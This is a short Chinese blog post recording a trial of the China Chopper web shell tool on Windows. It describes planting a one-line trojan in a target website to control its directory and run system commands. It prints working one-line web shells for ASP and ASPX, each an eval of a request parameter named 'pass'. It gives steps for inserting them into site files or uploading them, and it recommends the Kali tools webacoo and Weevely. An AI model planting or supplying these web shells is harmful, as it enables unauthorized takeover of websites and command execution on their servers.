2018-11 中国菜刀小试记录(windows环境)

一. 简介:

往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录并可执行一些web账号所有权限的系统命令,进入后渗透阶段。


传说中的官方网站:http://maicaidao.co/   。下载的时候发现是2014年的版本。。。


测试完官方的中国菜刀后,从Cracer的Cracer安全工具包v7版中拿了一个相对较新的,但是发现百度上找到的菜刀都有后门,并且中国菜刀的这些一句话木马很容易就被杀毒软件查杀了,所以推荐两款更好的kali下的工具:webacoo、Weevely 。

 


二. 记录:


asp的一句话是: <%eval request ("pass")%>
aspx的一句话是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
php的一句话是:


我们可以直接将这些语句插入到网站上的某个asp/aspx/php文件上,或者直接创建一个新的文件,在里面写入这些语句,然后把文件上传到网站上即可。

使用起来非常简单,如下图:

2018-11 中国菜刀小试记录(windows环境)_第1张图片

你可能感兴趣的:(web安全渗透)